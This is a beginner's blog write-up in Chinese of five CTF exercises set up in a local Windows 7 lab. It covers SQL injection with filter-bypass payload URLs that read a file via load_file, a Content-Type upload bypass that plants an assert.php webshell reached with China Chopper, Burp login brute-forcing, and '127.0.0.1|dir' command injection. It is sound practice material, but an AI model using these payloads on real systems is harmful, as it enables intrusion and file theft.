CTF的sql注入、文件包含、文件上传突破等五道题

本文详细介绍了在Windows 7系统中搭建CTF环境的过程,并通过实战演练,包括SQL注入、文件包含、文件上传突破、验证码爆破及命令执行等常见攻击手法,提供了丰富的攻防技巧与案例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

使用win7建立一个ctf的环境,在本地测试实验

新手练习,在网上找了很多的资料

 

1、sql注入

    http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=1%%27)--+

http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=1%%27)order%20by%204--+

http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=a%%27)%20ununionion%20all%20select%201,2,3,@@datadir--+

http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=a%%27)%20ununionion%20all%20select%201,2,3,load_file(%27c:\\flag.txt%27)--+

 

 

2、文件包含

 

 

查看页面源代码

对密文进行解密分析

抓包转发测试

更改菜刀config.ini文件

用菜刀去连接 区分大小写

 

 

 

3、文件上传突破

 

上传assert.php

抓包更改Content-Type的值为:image/png

上传成功

点击查看,触发assert.php

用菜刀连接

 

 

4、验证码爆破

对目标网站进行burp抓包

转发到indruder进行密码爆破

对爆破进行分析,错误的请求的length都为1984,爆破到一个请求的length值为1989,

使用这个123qwe去更改源数据包的password值

 

成功登陆拿到key

 

 

5、命令执行

使用127.0.0.1|dir 查看当前目录下的文件

查看ipconfig

查看key.php文件内容

对登陆进行抓包

更改127.0.0.1的值

查看原文件key.php

 

 

新手练习,如有错误,请各位大佬多多指教!!!!

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值